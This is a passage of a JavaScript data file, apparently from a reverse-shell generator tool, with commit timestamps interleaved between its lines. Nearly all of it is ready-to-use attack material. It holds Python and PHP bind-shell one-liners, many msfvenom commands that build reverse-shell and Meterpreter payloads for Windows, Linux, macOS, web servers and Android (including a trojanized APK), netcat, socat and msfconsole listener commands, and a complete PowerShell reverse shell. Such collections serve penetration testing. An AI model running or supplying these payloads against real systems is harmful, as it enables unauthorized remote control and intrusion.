"command" : "python3 -c 'exec(\"\"\"import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind((\"0.0.0.0\",{port}));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())\"\"\")'" ,
"meta" : [ "bind" , "mac" , "linux" , "windows" ]
} ,
{
"name" : "PHP Bind" ,
2021-03-19 21:10:57 +00:00
"command" : "php -r '$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_bind($s,\"0.0.0.0\",{port});\socket_listen($s,1);$cl=socket_accept($s);while(1){if(!socket_write($cl,\"$ \",2))exit;\$in=socket_read($cl,100);$cmd=popen(\"$in\",\"r\");while(!feof($cmd)){$m=fgetc($cmd);socket_write($cl,$m,strlen($m));}}'" ,
2021-03-15 23:09:02 +00:00
"meta" : [ "bind" , "mac" , "linux" , "windows" ]
}
]
) ;
const msfvenomCommands = withCommandType (
CommandType . MSFVenom ,
[
{
2021-03-23 13:43:12 +00:00
"name" : "Windows Meterpreter Staged Reverse TCP (x64)" ,
"command" : "msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={ip} LPORT={port} -f exe -o reverse.exe" ,
2021-03-15 23:09:02 +00:00
"meta" : [ "msfvenom" , "windows" , "staged" , "meterpreter" , "reverse" ]
} ,
{
2021-03-23 13:43:12 +00:00
"name" : "Windows Meterpreter Stageless Reverse TCP (x64)" ,
"command" : "msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST={ip} LPORT={port} -f exe -o reverse.exe" ,
2021-03-15 23:09:02 +00:00
"meta" : [ "msfvenom" , "windows" , "stageless" , "reverse" ]
} ,
{
2021-03-23 13:43:12 +00:00
"name" : "Windows Staged Reverse TCP (x64)" ,
"command" : "msfvenom -p windows/x64/reverse_tcp LHOST={ip} LPORT={port} -f exe -o reverse.exe" ,
"meta" : [ "msfvenom" , "windows" , "staged" , "meterpreter" , "reverse" ]
} ,
{
"name" : "Windows Stageless Reverse TCP (x64)" ,
"command" : "msfvenom -p windows/x64/shell_reverse_tcp LHOST={ip} LPORT={port} -f exe -o reverse.exe" ,
"meta" : [ "msfvenom" , "windows" , "stageless" , "reverse" ]
} ,
{
"name" : "Linux Meterpreter Staged Reverse TCP (x64)" ,
"command" : "msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={ip} LPORT={port} -f elf -o reverse.elf" ,
2021-03-15 23:09:02 +00:00
"meta" : [ "msfvenom" , "linux" , "meterpreter" , "staged" , "reverse" ]
} ,
{
2021-03-23 13:43:12 +00:00
"name" : "Linux Stageless Reverse TCP (x64)" ,
"command" : "msfvenom -p linux/x64/shell_reverse_tcp LHOST={ip} LPORT={port} -f elf -o reverse.elf" ,
2021-03-15 23:09:02 +00:00
"meta" : [ "msfvenom" , "linux" , "meterpreter" , "stageless" , "reverse" ]
} ,
{
2021-03-23 13:43:12 +00:00
"name" : "Windows Bind TCP ShellCode - BOF" ,
"command" : "msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -f python -v notBuf -o shellcode" ,
"meta" : [ "msfvenom" , "windows" , "bind" , "bufferoverflow" ]
} ,
{
"name" : "macOS Meterpreter Staged Reverse TCP (x64)" ,
"command" : "msfvenom -p osx/x64/meterpreter/reverse_tcp LHOST={ip} LPORT={port} -f macho -o shell.macho" ,
"meta" : [ "msfvenom" , "mac" , "stageless" , "reverse" ]
} ,
{
"name" : "macOS Meterpreter Stageless Reverse TCP (x64)" ,
"command" : "msfvenom -p osx/x64/meterpreter_reverse_tcp LHOST={ip} LPORT={port} -f macho -o shell.macho" ,
"meta" : [ "msfvenom" , "mac" , "stageless" , "reverse" ]
} ,
{
"name" : "macOS Stageless Reverse TCP (x64)" ,
"command" : "msfvenom -p osx/x64/shell_reverse_tcp LHOST={ip} LPORT={port} -f macho -o shell.macho" ,
2021-03-15 23:09:02 +00:00
"meta" : [ "msfvenom" , "mac" , "stageless" , "reverse" ]
} ,
{
"name" : "PHP Meterpreter Stageless Reverse TCP" ,
2021-03-23 13:43:12 +00:00
"command" : "msfvenom -p php/meterpreter_reverse_tcp LHOST={ip} LPORT={port} -f raw -o shell.php" ,
"meta" : [ "msfvenom" , "windows" , "linux" , "meterpreter" , "stageless" , "reverse" ]
} ,
{
"name" : "PHP Reverse PHP" ,
2021-04-09 22:51:35 +00:00
"command" : "msfvenom -p php/reverse_php LHOST={ip} LPORT={port} -o shell.php" ,
2021-03-15 23:09:02 +00:00
"meta" : [ "msfvenom" , "windows" , "linux" , "meterpreter" , "stageless" , "reverse" ]
} ,
{
"name" : "JSP Stageless Reverse TCP" ,
2021-03-23 13:43:12 +00:00
"command" : "msfvenom -p java/jsp_shell_reverse_tcp LHOST={ip} LPORT={port} -f raw -o shell.jsp" ,
2021-03-15 23:09:02 +00:00
"meta" : [ "msfvenom" , "windows" , "linux" , "meterpreter" , "stageless" , "reverse" ]
} ,
{
"name" : "WAR Stageless Reverse TCP" ,
2021-03-23 13:43:12 +00:00
"command" : "msfvenom -p java/jsp_shell_reverse_tcp LHOST={ip} LPORT={port} -f war -o shell.war" ,
2021-03-15 23:09:02 +00:00
"meta" : [ "msfvenom" , "windows" , "linux" , "stageless" , "reverse" ]
} ,
{
"name" : "Android Meterpreter Reverse TCP" ,
2021-04-05 16:14:48 +00:00
"command" : "msfvenom --platform android -p android/meterpreter/reverse_tcp lhost={ip} lport={port} R -o malicious.apk" ,
2021-03-15 23:09:02 +00:00
"meta" : [ "msfvenom" , "android" , "android" , "reverse" ]
} ,
{
"name" : "Android Meterpreter Embed Reverse TCP" ,
2021-04-05 16:14:48 +00:00
"command" : "msfvenom --platform android -x template-app.apk -p android/meterpreter/reverse_tcp lhost={ip} lport={port} -o payload.apk" ,
2021-03-15 23:09:02 +00:00
"meta" : [ "msfvenom" , "android" , "android" , "reverse" ]
2021-03-14 00:42:11 +00:00
} ,
2021-03-15 23:09:02 +00:00
{
"name" : "Python Stageless Reverse TCP" ,
2021-03-23 13:43:12 +00:00
"command" : "msfvenom -p cmd/unix/reverse_python LHOST={ip} LPORT={port} -f raw -o shell.py" ,
2021-03-15 23:09:02 +00:00
"meta" : [ "msfvenom" , "windows" , "linux" , "stageless" , "reverse" ]
} ,
{
"name" : "Bash Stageless Reverse TCP" ,
2021-03-23 13:43:12 +00:00
"command" : "msfvenom -p cmd/unix/reverse_bash LHOST={ip} LPORT={port} -f raw -o shell.sh" ,
2021-03-15 23:09:02 +00:00
"meta" : [ "msfvenom" , "linux" , "macos" , "stageless" , "reverse" ]
} ,
]
) ;
const rsgData = {
listenerCommands : [
[ 'nc' , 'nc -lvnp {port}' ] ,
2021-04-18 13:58:17 +00:00
[ 'ncat' , 'ncat -lvnp {port}' ] ,
2021-04-18 14:02:11 +00:00
[ 'ncat (TLS)' , 'ncat --ssl -lvnp {port}' ] ,
2021-03-15 23:09:02 +00:00
[ 'rlwrap + nc' , 'rlwrap -cAr nc -lvnp {port}' ] ,
[ 'pwncat' , 'python3 -m pwncat -lp {port}' ] ,
[ 'windows ConPty' , 'stty raw -echo; (stty size; cat) | nc -lvnp {port}' ] ,
[ 'socat' , 'socat -d -d TCP-LISTEN:{port} STDOUT' ] ,
[ 'socat (TTY)' , 'socat -d -d file:`tty`,raw,echo=0 TCP-LISTEN:{port}' ] ,
2021-04-04 19:37:06 +00:00
[ 'powercat' , 'powercat -l -p {port}' ] ,
[ 'msfconsole' , 'msfconsole -q -x "use multi/handler; set payload {payload}; set lhost {ip}; set lport {port}; exploit"' ]
2021-03-14 00:42:11 +00:00
] ,
2021-03-15 23:09:02 +00:00
shells : [ 'sh' , '/bin/sh' , 'bash' , '/bin/bash' , 'cmd' , 'powershell' , 'ash' , 'bsh' , 'csh' , 'ksh' , 'zsh' , 'pdksh' , 'tcsh' ] ,
2021-03-14 00:42:11 +00:00
2021-03-15 23:09:02 +00:00
upgrade : [ 'python' , ] ,
2021-03-14 21:55:08 +00:00
2021-03-15 23:09:02 +00:00
specialCommands : {
'PowerShell payload' : '$client = New-Object System.Net.Sockets.TCPClient("{ip}",{port});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
2021-03-14 21:55:08 +00:00
} ,
2021-03-14 00:42:11 +00:00
2021-03-15 23:09:02 +00:00
reverseShellCommands : [
... reverseShellCommands ,
... bindShellCommands ,
... msfvenomCommands
]
2021-03-09 02:53:42 +00:00
}
2021-03-20 18:38:52 +00:00
// Export the data for use within netlify functions / node
if ( typeof exports !== 'undefined' ) {
exports . rsgData = rsgData ;
}